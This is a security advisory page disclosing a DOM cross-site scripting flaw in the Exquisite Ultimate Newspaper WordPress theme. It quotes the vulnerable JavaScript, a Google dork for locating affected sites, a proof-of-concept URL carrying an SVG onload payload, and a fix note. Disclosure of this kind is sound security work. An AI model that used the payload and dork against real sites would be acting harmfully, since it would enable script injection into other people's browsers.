WordPress Exquisite Ultimate Newspaper 1.3.3 Cross Site Scripting

2015.04.28
Credit: Osama Mahmood
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/wp-content/exquisite-wp/assets/

# Exploit Title: DOM Cross Site Scripting In Exquisite - Ultimate Newspaper WordPressTheme # Google Dork: inurl:/wp-content/exquisite-wp/assets/ # Date: 24/04/2015 # Exploit Author: Osama Mahmood (M4rkm3n) # Vendor Homepage: http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019 # Software Link: http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019 # Tested on: Windows 8/7 Hello friend, Today i am filling this vulnerability which i found in the WordPress theme (Exquisite - Ultimate Newspaper) DOM XSS The vulnerability was caused by the issue is at line 83 of exquisite-wp/assets/js/jquery.foundation.plugins.js Vulnerable Code :- }); if (window.location.hash) { activateTab($('a[href="' + window.location.hash + '"]').parent('dd')); settings.callback(); } }; and it was causing DOM XSS. [-] Proof Of Concept: URL: http://localhost/x/wordpress/wp-content/exquisite-wp/assets/ http://localhost/x/wordpress/#<svg/onload=prompt(document.domain)> [-] Fix / Solution: Update to latest framework. [-] Reported: Was reported to the Developers on 26/04/2015 My Profile :- https://www.facebook.com/th3.m4rkm3n.007 https://twitter.com/OsamaMahmood007 https://www.linkedin.com/in/osamamahmood007

References:

https://www.facebook.com/th3.m4rkm3n.007
https://twitter.com/OsamaMahmood007
https://www.linkedin.com/in/osamamahmood007


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top